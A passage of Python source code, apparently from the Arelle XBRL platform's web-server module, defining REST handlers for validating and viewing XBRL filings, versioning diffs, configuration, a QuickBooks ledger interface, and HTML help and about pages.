"roleTypes": "roleTypesFile",
"arcroleTypes": "arcroleTypesFile"
}
class Options():
"""Class to emulate options needed by CntlrCmdLine.run"""
def __init__(self):
for option, defaultValue in optionsPrototype.items():
setattr(self, option, defaultValue)
supportedViews = {'DTS', 'concepts', 'pre', 'cal', 'dim', 'facts', 'factTable', 'formulae', 'roleTypes', 'arcroleTypes'}
def validation(file=None):
"""REST request to validate, by *get* or *post*, to URL patterns including */rest/xbrl/<file:path>/{open|close|validation|DTS...}*,
and */rest/xbrl/{view|open|close}*.
Sets up CntrlCmdLine options for request, performed by runOptionsAndGetResult using CntlrCmdLine.run with get or post arguments.
:returns: html, xhtml, xml, json, text -- Return per media type argument and request arguments
"""
errors = []
flavor = request.query.flavor or 'standard'
media = request.query.media or 'html'
requestPathParts = request.urlparts[2].split('/')
isValidation = 'validation' == requestPathParts[-1] or 'validation' == requestPathParts[-2]
view = request.query.view
viewArcrole = request.query.viewArcrole
if request.method == 'POST':
mimeType = request.get_header("Content-Type")
if mimeType.startswith("multipart/form-data"):
_upload = request.files.get("upload")
if not _upload or not _upload.filename.endswith(".zip"):
errors.append(_("POST file upload must be a zip file"))
sourceZipStream = None
else:
sourceZipStream = _upload.file
elif mimeType not in ('application/zip', 'application/x-zip', 'application/x-zip-compressed', 'multipart/x-zip'):
errors.append(_("POST must provide a zip file, Content-Type '{0}' not recognized as a zip file.").format(mimeType))
sourceZipStream = request.body
else:
sourceZipStream = None
if not view and not viewArcrole:
if requestPathParts[-1] in supportedViews:
view = requestPathParts[-1]
if isValidation:
if view or viewArcrole:
errors.append(_("Only validation or one view can be specified in one requested."))
if media not in ('xml', 'xhtml', 'html', 'json', 'text') and not (sourceZipStream and media == 'zip'):
errors.append(_("Media '{0}' is not supported for validation (please select xhtml, html, xml, json or text)").format(media))
elif view or viewArcrole:
if media not in ('xml', 'xhtml', 'html', 'csv', 'json'):
errors.append(_("Media '{0}' is not supported for view (please select xhtml, html, xml, csv, or json)").format(media))
elif requestPathParts[-1] not in ("open", "close"):
errors.append(_("Neither validation nor view requested, nothing to do."))
if (flavor not in ('standard', 'standard-except-formula', 'formula-compile-only', 'formula-compile-and-run')
and not flavor.startswith('edgar') and not flavor.startswith('sec')):
errors.append(_("Flavor '{0}' is not supported").format(flavor))
if view and view not in supportedViews:
errors.append(_("View '{0}' is not supported").format(view))
if errors:
errors.insert(0, _("URL: ") + (file or request.query.file or '(no file)'))
return errorReport(errors, media)
options = Options() # need named parameters to simulate options
isFormulaOnly = False
for key, value in request.query.items():
if key == "file":
setattr(options, "entrypointFile", value)
elif key == "flavor":
if value.startswith("sec") or value.startswith("edgar"):
setattr(options, "validateEFM", True)
elif value == "formula-compile-only":
isFormulaOnly = True
setattr(options, "formulaAction", "validate")
elif value == "formula-compile-and-run":
isFormulaOnly = True
setattr(options, "formulaAction", "run")
elif value == "standard-except-formula":
setattr(options, "formulaAction", "none")
elif key in("media", "view", "viewArcrole"):
pass
elif key in validationOptions:
optionKey, optionValue = validationOptions[key]
setattr(options, optionKey, optionValue if optionValue is not None else value)
elif key in validationKeyVarName:
setattr(options, validationKeyVarName[key], value or True)
elif not value: # convert plain str parameter present to True parameter
setattr(options, key, True)
else:
setattr(options, key, value)
if file:
setattr(options, "entrypointFile", file.replace(';','/'))
requestPathParts = set(request.urlparts[2].split('/'))
viewFile = None
if isValidation:
if not isFormulaOnly:
setattr(options, "validate", True)
elif view:
viewFile = FileNamedStringIO(media)
setattr(options, view + "File", viewFile)
elif viewArcrole:
viewFile = FileNamedStringIO(media)
setattr(options, "viewArcrole", viewArcrole)
setattr(options, "viewFile", viewFile)
return runOptionsAndGetResult(options, media, viewFile, sourceZipStream)
def runOptionsAndGetResult(options, media, viewFile, sourceZipStream=None):
"""Execute request according to options, for result in media, with *post*ed file in sourceZipStream, if any.
:returns: html, xml, csv, text -- Return per media type argument and request arguments
"""
if media == "zip" and not viewFile:
responseZipStream = io.BytesIO()
else:
responseZipStream = None
successful = cntlr.run(options, sourceZipStream, responseZipStream)
if media == "xml":
response.content_type = 'text/xml; charset=UTF-8'
elif media == "csv":
response.content_type = 'text/csv; charset=UTF-8'
elif media == "json":
response.content_type = 'application/json; charset=UTF-8'
elif media == "text":
response.content_type = 'text/plain; charset=UTF-8'
elif media == "zip":
response.content_type = 'application/zip; charset=UTF-8'
else:
response.content_type = 'text/html; charset=UTF-8'
if successful and viewFile:
# defeat re-encoding
result = viewFile.getvalue().replace(" ","\u00A0").replace("­","\u00AD").replace("&","&")
viewFile.close()
elif media == "zip":
responseZipStream.seek(0)
result = responseZipStream.read()
responseZipStream.close()
cntlr.logHandler.clearLogBuffer() # zip response file may contain non-cleared log entries
elif media == "xml":
result = cntlr.logHandler.getXml()
elif media == "json":
result = cntlr.logHandler.getJson()
elif media == "text":
_logFormat = request.query.logFormat
if _logFormat:
_stdLogFormatter = cntlr.logHandler.formatter
cntlr.logHandler.formatter = LogFormatter(_logFormat)
result = cntlr.logHandler.getText()
if _logFormat:
cntlr.logHandler.formatter = _stdLogFormatter
del _stdLogFormatter # dereference
else:
result = htmlBody(tableRows(cntlr.logHandler.getLines(), header=_("Messages")))
return result
def diff():
"""Execute versioning diff request for *get* request to */rest/xbrl/diff*.
:returns: xml -- Versioning report.
"""
if not request.query.fromDTS or not request.query.toDTS or not request.query.report:
return _("From DTS, to DTS, and report must be specified")
options = Options()
setattr(options, "entrypointFile", request.query.fromDTS)
setattr(options, "diffFile", request.query.toDTS)
fh = FileNamedStringIO(request.query.report)
setattr(options, "versReportFile", fh)
cntlr.run(options)
reportContents = fh.getvalue()
fh.close()
response.content_type = 'text/xml; charset=UTF-8'
return reportContents
def configure():
"""Set up features for *get* requests to */rest/configure*, e.g., proxy or plug-ins.
:returns: html -- Status of configuration request (e.g., proxy or plug-ins).
"""
if not request.query.proxy and not request.query.plugins and not request.query.packages and 'environment' not in request.query:
return _("proxy, plugins, packages or environment must be specified")
options = Options()
if request.query.proxy:
setattr(options, "proxy", request.query.proxy)
if request.query.plugins:
setattr(options, "plugins", request.query.plugins)
if request.query.packages:
setattr(options, "packages", request.query.packages)
if 'environment' in request.query:
setattr(options, "showEnvironment", True)
cntlr.run(options)
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows(cntlr.logHandler.getLines(), header=_("Configuration Request")))
def stopWebServer():
"""Stop the web server by *get* requests to */rest/stopWebServer*.
"""
def stopSoon(delaySeconds):
time.sleep(delaySeconds)
import signal
os.kill(_os_pid, signal.SIGTERM)
thread = threading.Thread(target=lambda: stopSoon(2.5))
thread.daemon = True
thread.start()
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows((time.strftime("Received at %Y-%m-%d %H:%M:%S"),
"Good bye...",),
header=_("Stop Request")))
def quickbooksServer():
"""Interface to QuickBooks server responding to *post* requests to */quickbooks/server.asmx*.
(Part of QuickBooks protocol, see module CntlrQuickBooks.)
"""
from arelle import CntlrQuickBooks
response.content_type = 'text/xml; charset=UTF-8'
return CntlrQuickBooks.server(cntlr, request.body, request.urlparts)
def quickbooksGLrequest(qbReport=None, file=None):
"""Initiate request to QuickBooks server for *get* requests to */rest/quickbooks/<qbReport>/xbrl-gl/...*.
:returns: html, xml, csv, text -- Return per media type argument and request arguments
"""
from arelle.CntlrQuickBooks import supportedQbReports, qbRequest
from arelle.ModelValue import dateTime
errors = []
requestPathParts = request.urlparts[2].split('/')
viewRequested = "view" == requestPathParts[-1]
media = request.query.media or 'html'
fromDate = request.query.fromDate
toDate = request.query.toDate
if qbReport not in supportedQbReports:
errors.append(_("QuickBooks report '{0}' is not supported (please select from: {1})").format(
qbReport, ', '.join(supportedQbReports)))
if media not in ('xml', 'xhtml', 'html'):
errors.append(_("Media '{0}' is not supported for xbrl-gl (please select xhtml, html or xml)").format(media))
if not fromDate or dateTime(fromDate) is None:
errors.append(_("FromDate '{0}' missing or not valid").format(fromDate))
if not toDate or dateTime(toDate) is None:
errors.append(_("ToDate '{0}' missing or not valid").format(toDate))
if errors:
return errorReport(errors, media)
ticket = qbRequest(qbReport, fromDate, toDate, file)
result = htmlBody(tableRows([_("Request queued for QuickBooks...")], header=_("Quickbooks Request")), script='''
<script type="text/javascript">
<!--
var timer = setInterval("autoRefresh()", 1000 * 10);
function autoRefresh(){{location.href = "/rest/quickbooks/response?ticket={0}&media={1}&view={2}";}}
//-->
</script>
'''.format(ticket, media, viewRequested))
return result
def quickbooksGLresponse():
"""Poll for QuickBooks protocol responses for *get* requests to */rest/quickbooks/response*.
:returns: html, xml, csv, text -- Return per media type argument and request arguments, if response is ready, otherwise javascript to requery this *get* request periodicially.
"""
from arelle import CntlrQuickBooks
ticket = request.query.ticket
media = request.query.media
viewRequested = request.query.view
status = CntlrQuickBooks.qbRequestStatus.get(ticket)
if not status:
return htmlBody(tableRows([_("QuickBooks ticket not found, request canceled.")], header=_("Quickbooks Request")))
if status.startswith("ConnectionErrorMessage: "):
CntlrQuickBooks.qbRequestStatus.pop(ticket, None)
return errorReport([status[24:]], media)
if status != "Done" or ticket not in CntlrQuickBooks.xbrlInstances:
return htmlBody(tableRows([_("{0}, Waiting 20 seconds...").format(status)],
header=_("Quickbooks Request")),
script='''
<script type="text/javascript">
<!--
var timer = setInterval("autoRefresh()", 1000 * 20);
function autoRefresh(){{clearInterval(timer);self.location.reload(true);}}
//-->
</script>
''')
CntlrQuickBooks.qbRequestStatus.pop(ticket)
instanceUuid = CntlrQuickBooks.xbrlInstances[ticket]
CntlrQuickBooks.xbrlInstances.pop(ticket)
options = Options()
setattr(options, "entrypointFile", instanceUuid)
viewFile = FileNamedStringIO(media)
setattr(options, "factsFile", viewFile)
return runOptionsAndGetResult(options, media, viewFile)
def quickbooksWebPage():
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle QuickBooks Global Ledger Interface</th></tr>
<tr><td>checkbox</td><td>Trial Balance.</td></tr>
<tr><td>close button</td><td>Done</td></tr>
</table>'''))
def localhostCertificate():
"""Interface to QuickBooks server responding to *get* requests for a host certificate */quickbooks/localhost.crt* or */localhost.crt*.
(Supports QuickBooks protocol.)
:returns: self-signed certificate
"""
return '''
-----BEGIN CERTIFICATE-----
MIIDljCCAn4CAQAwDQYJKoZIhvcNAQEEBQAwgZAxCzAJBgNVBAYTAlVTMRMwEQYD
VQQIEwpDYWxpZm9ybmlhMQ8wDQYDVQQHEwZFbmNpbm8xEzARBgNVBAoTCmFyZWxs
ZS5vcmcxDzANBgNVBAsTBmFyZWxsZTESMBAGA1UEAxMJbG9jYWxob3N0MSEwHwYJ
KoZIhvcNAQkBFhJzdXBwb3J0QGFyZWxsZS5vcmcwHhcNMTIwMTIwMDg0NjM1WhcN
MTQxMDE1MDg0NjM1WjCBkDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3Ju
aWExDzANBgNVBAcTBkVuY2lubzETMBEGA1UEChMKYXJlbGxlLm9yZzEPMA0GA1UE
CxMGYXJlbGxlMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEnN1
cHBvcnRAYXJlbGxlLm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMJEq9zT4cdA2BII4TG4OJSlUP22xXqNAJdZZeB5rTIX4ePwIZ8KfFh/XWQ1/q5I
c/rkZ5TyC+SbEmQa/unvv1CypMAWWMfuguU6adOsxt+zFFMJndlE1lr3A2SBjHbD
vBGzGJJTivBzDPBIQ0SGcf32usOeotmE2PA11c5en8/IsRXm9+TA/W1xL60mfphW
9PIaJ+WF9rRROjKXVdQZTRFsNRs/Ag8o3jWEyWYCwR97+XkorYsAJs2TE/4zV+8f
8wKuhOrsy9KYFZz2piVWaEC0hbtDwX1CqN+1oDHq2bYqLygUSD/LbgK1lxM3ciVy
ewracPVHBErPlcJFxiOxAw0CAwEAATANBgkqhkiG9w0BAQQFAAOCAQEAM2np3UVY
6g14oeV0Z32Gn04+r6FV2D2bobxCVLIQDsWGEv1OkjVBJTu0bLsZQuNVZHEn5a+2
I0+MGME3HK1rx1c8MrAsr5u7ZLMNj7cjjtFWAUp9GugJyOmGK136o4/j1umtBojB
iVPvHsAvwZuommfME+AaBE/aJjPy5I3bSu8x65o1fuJPycrSeLAnLd/shCiZ31xF
QnJ9IaIU1HOusplC13A0tKhmRMGNz9v+Vqdj7J/kpdTH7FNMulrJTv/0ezTPjaOB
QhpLdqly7hWJ23blbQQv4ILT2CiPDotJslcKDT7GzvPoDu6rIs2MpsB/4RDYejYU
+3cu//C8LvhjkQ==
-----END CERTIFICATE-----
'''
def helpREST():
"""Help web page for *get* requests to */help*.
:returns: html - Table of CntlrWebMain web API
"""
return htmlBody(_('''<table>
<tr><th colspan="2">Arelle web API</th></tr>
<tr><td>/help</td><td>This web page.</td></tr>
<tr><td>/about</td><td>About web page, copyrights, etc.</td></tr>
<tr><th colspan="2">Validation</th></tr>
<tr><td>/rest/xbrl/{file}/validation/xbrl</td><td>Validate document at {file}.</td></tr>
''') +
(_('''
<tr><td>\u00A0</td><td>For an http POST of a zip file (mime type application/zip), {file} is the relative file path inside the zip file.</td></tr>
<tr><td>\u00A0</td><td>For an http GET request, {file} may be a web url, and may have "/" characters replaced by ";" characters
(but that is not necessary).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c.xbrl/validation/xbrl?media=xml</code>: Validate entry instance
document in the POSTed zip archived file c.xbrl and return structured xml results.</td></tr>
<tr><td>/rest/xbrl/validation</td><td>(Alternative syntax) Validate document, file is provided as a parameter (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/validation?file=c.xbrl&media=xml</code>: Validate entry instance
document c.xbrl (in POSTed zip) and return structured xml results.</td></tr>
''')
if cntlr.isGAE else
_('''
<tr><td>\u00A0</td><td>For a browser request or http GET request, {file} may be local or web url, and may have "/" characters replaced by ";" characters
(but that is not necessary).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c:/a/b/c.xbrl/validation/xbrl?media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
<tr><td>\u00A0</td><td>For an http POST of a zip file (mime type application/zip), {file} is the relative file path inside the zip file.</td></tr>
<tr><td>/rest/xbrl/validation</td><td>(Alternative syntax) Validate document, file is provided as a parameter (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/validation?file=c:/a/b/c.xbrl&media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
''')) +
_('''
<tr><td></td><td>Parameters are optional after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">flavor</td><td><code>standard</code>: XBRL 2.1 and XDT validation. (If formulas are present they will also be compiled and run.) (default)
<br/>{<code>sec</code>*|<code>edgar</code>*}: SEC Edgar Filer Manual validation. (If formulas are present they will also be compiled and run.)
<br/><code>standard-except-formula</code>: XBRL 2.1 and XDT validation. (If formulas are present they will be ignored.)
<br/><code>formula-compile-only</code>: Formulas will be compiled but not run. (No XBRL 2.1, XDT, or disclosure system validation.)
<br/><code>formula-compile-and-run</code>: Formulas will be compiled and run. (No XBRL 2.1, XDT, or disclosure system validation.)</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>json</code>: JSON results.
<br/><code>text</code>: Plain text results (no markup).</td></tr>
<tr><td style="text-indent: 1em;">file</td><td>Alternate way to specify file name or url by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">import</td><td>A list of files to import to the DTS, such as additional formula
or label linkbases. Multiple file names are separated by a '|' character.</td></tr>
<tr><td style="text-indent: 1em;">labelLang</td><td>Label language to override system settings, e.g., <code>&labelLang=ja</code>.</td></tr>
<tr><td style="text-indent: 1em;">labelRole</td><td>Label role instead of standard label, e.g., <code>&labelRole=http://www.xbrl.org/2003/role/verboseLabel</code>. To use the concept QName instead of a label, specify <code>&labelRole=XBRL-concept-name</code>.</td></tr>
<tr><td style="text-indent: 1em;">uiLang</td><td>User interface language to override system settings, e.g., <code>&uiLang=fr</code>. Changes setting for current session (but not saved setting).</td></tr>
<tr><td style="text-indent: 1em;">calcDecimals</td><td>Specify calculation linkbase validation inferring decimals.</td></tr>
<tr><td style="text-indent: 1em;">calcPrecision</td><td>Specify calculation linkbase validation inferring precision.</td></tr>
<tr><td style="text-indent: 1em;">efm-*</td><td>Select Edgar Filer Manual (U.S. SEC) disclosure system validation. (Alternative to flavor parameter.):<br/>
<code>efm-pragmatic</code>: SEC-required rules, currently-allowed years<br/>
<code>efm-strict</code>: SEC-semantic additional rules, currently-allowed years<br/>
<code>efm-pragmatic-all-years</code>: SEC-required rules, all years<br/>
<code>efm-strict-all-years</code>: SEC-semantic additional rules, all years</td></tr>
<tr><td style="text-indent: 1em;">ifrs</td><td>Specify IFRS Global Filer Manual validation.</td></tr>
<tr><td style="text-indent: 1em;">hmrc</td><td>Specify HMRC validation.</td></tr>
<tr><td style="text-indent: 1em;">sbr-nl</td><td>Specify SBR-NL taxonomy validation.</td></tr>
<tr><td style="text-indent: 1em;">utr</td><td>Select validation with respect to Unit Type Registry.</td></tr>
<tr><td style="text-indent: 1em;">infoset</td><td>Select validation with respect to testcase infoset.</td></tr>
<tr><td style="text-indent: 1em;">parameters</td><td>Specify parameters for validation or formula (comma separated name=value[,name2=value2]).</td></tr>
<tr><td style="text-indent: 1em;">formulaAsserResultCounts</td><td>Report formula assertion counts.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarSetExprResult</td><td>Trace variable set formula value, assertion test results.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarSetTiming</td><td>Trace variable set execution times.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarFilterWinnowing</td><td>Trace variable set filter winnowing.</td></tr>
<tr><td style="text-indent: 1em;">{other}</td><td>Other detailed formula trace parameters:<br/>
formulaParamExprResult, formulaParamInputValue, formulaCallExprSource, formulaCallExprCode, formulaCallExprEval,
formulaCallExprResult, formulaVarSetExprEval, formulaFormulaRules, formulaVarsOrder,
formulaVarExpressionSource, formulaVarExpressionCode, formulaVarExpressionEvaluation, formulaVarExpressionResult, formulaVarFiltersResult, and formulaRunIDs.
</td></tr>
<tr><td style="text-indent: 1em;">abortOnMajorError</td><td>Abort process on major error, such as when load is unable to find an entry or discovered file.</td></tr>
<tr><td style="text-indent: 1em;">collectProfileStats</td><td>Collect profile statistics, such as timing of validation activities and formulae.</td></tr>
<tr><td style="text-indent: 1em;">plugins</td><td>Activate plug-ins, specify '|' separated .py modules (relative to plug-in directory).</td></tr>
<tr><td style="text-indent: 1em;">packages</td><td>Activate taxonomy packages, specify '|' separated .zip packages (absolute URLs or file paths).</td></tr>
<tr><th colspan="2">Versioning Report (diff of two DTSes)</th></tr>
<tr><td>/rest/xbrl/diff</td><td>Diff two DTSes, producing an XBRL versioning report relative to report directory.</td></tr>
<tr><td></td><td>Parameters are requred "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">fromDTS</td><td>File name or url of from DTS.</td></tr>
<tr><td style="text-indent: 1em;">toDTS</td><td>File name or url of to DTS.</td></tr>
<tr><td style="text-indent: 1em;">report</td><td>File name or url of to report (to for relative path construction). The report is not written out, but its contents are returned by the web request to be saved by the requestor.</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/diff?fromDTS=c:/a/prev/old.xsd&toDTS=c:/a/next/new.xsd&report=c:/a/report/report.xml</code>: Diff two DTSes and produce versioning report.</td></tr>
<tr><th colspan="2">Views</th></tr>
<tr><td>/rest/xbrl/{file}/{view}</td><td>View document at {file}.</td></tr>
<tr><td>\u00A0</td><td>{file} may be local or web url, and may have "/" characters replaced by ";" characters (but that is not necessary).</td></tr>
<tr><td>\u00A0</td><td>{view} may be <code>DTS</code>, <code>concepts</code>, <code>pre</code>, <code>cal</code>, <code>dim</code>, <code>facts</code>, <code>factTable</code>, <code>formulae</code>, <code>roleTypes</code>, or <code>arcroleTypes</code>.</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c:/a/b/c.xbrl/dim?media=html</code>: View dimensions of
document at c:/a/b/c.xbrl (on local drive) and return html result.</td></tr>
<tr><td>/rest/xbrl/view</td><td>(Alternative syntax) View document, file and view are provided as parameters (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/view?file=c:/a/b/c.xbrl&view=dim&media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
<tr><td></td><td>Parameters are optional after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>csv</code>: CSV text results (no markup).
<br/><code>json</code>: JSON text results.</td></tr>
<tr><td style="text-indent: 1em;">file</td><td>Alternate way to specify file name or url by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">view</td><td>Alternate way to specify view by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">viewArcrole</td><td>Alternate way to specify view by indicating arcrole desired.</td></tr>
<tr><td style="text-indent: 1em;">import</td><td>A list of files to import to the DTS, such as additional formula
or label linkbases. Multiple file names are separated by a '|' character.</td></tr>
<tr><td style="text-indent: 1em;">factListCols</td><td>A list of column names for facts list. Multiple names are separated by a space or comma characters.
Example: <code>factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions</code></td></tr>
<tr><th colspan="2">Excel interface</th></tr>
<tr><td>GUI operation:</td><td>Select data tab.<br/>Click Get External Data From Web.<br/>
New Web Query dialog, enter rest URI to Address (example, for instance with indicated fact columns:
<code>http://localhost:8080/rest/xbrl/C:/Users/John Doe/Documents/eu/instance.xbrl/facts?media=xhtml&factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions</code><br/>
Before clicking Go, click Options, on Options dialog select Full HTML Formatting, then Ok to Options dialog.<br/>
Click Go.<br/>
Click arrow to select table.<br/>
Click Import button.<br/>
Review insertion cell, click ok on Import Data dialog.</td></tr>
<tr><td>VBA macro:</td><td>
<code>With ActiveSheet.QueryTables.Add(Connection:= _<br/>
"URL;http://localhost:8080/rest/xbrl/C:/Users/John Doe/Documents/eu/instance.xbrl/facts?media=xhtml&factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions" _<br/>
, Destination:=Range("$A$1"))<br/>
.Name = "facts"<br/>
.FieldNames = True<br/>
.RowNumbers = False<br/>
.FillAdjacentFormulas = False<br/>
.PreserveFormatting = False<br/>
.RefreshOnFileOpen = False<br/>
.BackgroundQuery = True<br/>
.RefreshStyle = xlInsertDeleteCells<br/>
.SavePassword = False<br/>
.SaveData = True<br/>
.AdjustColumnWidth = True<br/>
.RefreshPeriod = 0<br/>
.WebSelectionType = xlAllTables<br/>
.WebFormatting = xlWebFormattingAll<br/>
.WebPreFormattedTextToColumns = True<br/>
.WebConsecutiveDelimitersAsOne = True<br/>
.WebSingleBlockTextImport = False<br/>
.WebDisableDateRecognition = False<br/>
.WebDisableRedirections = False<br/>
.Refresh BackgroundQuery:=False<br/>
End With</code></td></tr>
<tr><th colspan="2">QuickBooks interface</th></tr>
<tr><td>Setup:</td><td>Install QuickBooks Web Connector by <a href="http://marketplace.intuit.com/webconnector/" target="installWBWC">clicking here</a>.<br/>
Click on QuickBooks.qwc in the Program Files Arelle directory, to install web connector for Arelle. (It specifies localhost:8080 in it.)<br/>
Open your QuickBooks and desired company<br/>
From start menu, programs, QuickBooks, start Web Connector (QBWC). Web connector may want a password, use any string, such as "abcd", as it's not checked at this time.<br/>
Start Arelle web server (if it wasn't already running)<br/>
To request xbrl-gl, select report type (generalLedger, journal, or trialBalance) and specify file name for xbrl-gl output instance.<br/>
QBWC polls once a minute, if impatient, in the QBWC window, click its Arelle checkbox and press the update button.<br/>
(If you get the error [8004041A] from Quickbooks, enable the company file for Arelle access in
Quickbooks: Edit->Preferences...->Integrated Applications->Company Preferences->click allow web access for ArelleWebService)<br/>
</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>http://localhost:8080/rest/quickbooks/generalLedger/xbrl-gl/C:/mystuff/xbrlGeneralLedger.xbrl/view?fromDate=2011-01-01&toDate=2011-12-31</code>
(You may omit <code>/view</code>.)</td></tr>
<tr><td></td><td>Parameters follow "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>json</code>: JSON results.
<br/><code>text</code>: Plain text results (no markup).</td></tr>
<tr><td style="text-indent: 1em;">fromDate, toDate</td><td>From & to dates for GL transactions</td></tr>
<tr><th colspan="2">Management</th></tr>
<tr><td>/rest/configure</td><td>Configure settings:</td></tr>
<tr><td></td><td>Parameters are required following "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">proxy</td><td>Show or modify and re-save proxy settings:<br/>
Enter 'show' to view current setting, 'system' to configure to use system proxy setting, 'none' to configure for no proxy, or 'http://[user[:password]@]host[:port]' (e.g., http://192.168.1.253, http://example.com:8080, http://joe:secret@example.com:8080)." ))
</td></tr>
<tr><td style="text-indent: 1em;">plugins</td><td>Show or modify and re-save plug-ins configuration:<br/>
Enter 'show' to view plug-ins configuration, , or '|' separated modules:
+url to add plug-in by its url or filename (relative to plug-in directory else absolute), ~name to reload a plug-in by its name, -name to remove a plug-in by its name,
(e.g., '+http://arelle.org/files/hello_web.py', '+C:\Program Files\Arelle\examples\plugin\hello_dolly.py' to load,
~Hello Dolly to reload, -Hello Dolly to remove). (Note that plug-ins are transient on Google App Engine, specify with &plugins to other rest commands.)
</td></tr>
<tr><td style="text-indent: 1em;">packages</td><td>Show or modify and re-save taxonomy packages configuration:<br/>
Enter 'show' to view packages configuration, , or '|' separated package URLs:
+url to add package by its full url or filename, ~name to reload a package by its name, -name to remove a package by its name.
(Note that packages are transient on Google App Engine, specify with &packages to other rest commands.)
</td></tr>
<tr><td style="text-indent: 1em;">environment</td><td>Show host environment (config and cache directories).</td></tr>
''') +
(_('''
<tr><td>/rest/stopWebServer</td><td>Shut down (terminate process after 2.5 seconds delay).</td></tr>
''') if cntlr.isGAE else '') +
'</table>')
def about(arelleImgFile=None):
from lxml import etree
"""About web page for *get* requests to */about*.
:returns: html - About web page
"""
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">About arelle</th></tr>
<tr><td rowspan="12" style="vertical-align:top;"><img src="%s"/></td><td>arelle® version: %s %sbit %s. An open source XBRL platform</td></tr>
<tr><td>© 2010-2015 Mark V Systems Limited. All rights reserved.</td></tr>
<tr><td>Web site: <a href="http://www.arelle.org">http://www.arelle.org</a>.
E-mail support: <a href="mailto:support@arelle.org">support@arelle.org</a>.</td></tr>
<tr><td>Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file
except in compliance with the License. You may obtain a copy of the License at
<a href="http://www.apache.org/licenses/LICENSE-2.0">http://www.apache.org/licenses/LICENSE-2.0</a>.
Unless required by applicable law or agreed to in writing, software distributed under the License
is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.</td></tr>
<tr><td>Includes:</td><tr>
<tr><td style="text-indent: 2.0em;">Python® %s.%s.%s © 2001-2010 Python Software Foundation</td></tr>
<tr><td style="text-indent: 2.0em;">PyParsing © 2003-2010 Paul T. McGuire</td></tr>
<tr><td style="text-indent: 2.0em;">lxml %s.%s.%s © 2004 Infrae, ElementTree © 1999-2004 by Fredrik Lundh</td></tr>
<tr><td style="text-indent: 2.0em;">Bottle © 2011 Marcel Hellkamp</td></tr>
</table>''') % (arelleImgFile or '/images/arelle32.gif',
cntlr.__version__,
cntlr.systemWordSize,
Version.version,
sys.version_info[0],sys.version_info[1],sys.version_info[2],
etree.LXML_VERSION[0],etree.LXML_VERSION[1],etree.LXML_VERSION[2]) )
def indexPageREST():
"""Index (default) web page for *get* requests to */*.
:returns: html - Web page of choices to navigate to */help* or */about*.
"""
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle Web Services</th></tr>
<tr><td>/help</td><td>Help web page, web services API.</td></tr>
<tr><td>/about</td><td>About web page, copyrights, license, included software.</td></tr>
</table>'''))
def indexPageCGI():
"""Default web page response for *get* CGI request with no parameters.
:returns: html - Web page of choices to navigate to *?help* or *?about*.
"""
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle CGI Services</th></tr>
<tr><td>?help</td><td>Help web page, CGI services.</td></tr>
<tr><td>?about</td><td>About web page, copyrights, license, included software.</td></tr>
<tr><td>REST API</td><td>The Arelle REST API is supported through CGI if the entire CGI path is wildcard-mapped to the arelleCmdLine executable.</td></tr>
</table>'''))
def htmlBody(body, script=""):
"""Wraps body html string in a css-styled html web page
:param body: Contents for the *<body>* element
:type body: html str
:param script: Script to insert in generated html web page (such as a timed reload script)
:type script: javascript str
:returns: html - Web page of choices to navigate to */help* or */about*.
"""
return '''
<?xml version="1.0" encoding="utf-8"?>
<html xmlns="http://www.w3.org/1999/xhtml">
%s <head>
<STYLE type="text/css">
body, table, p {font-family:Arial,sans-serif;font-size:10pt;}
table {vertical-align:top;white-space:normal;}
th {{background:#eee;}}
td {vertical-align:top;}
.tableHdr{border-top:.5pt solid windowtext;border-right:none;border-bottom:none;border-left:.5pt solid windowtext;}
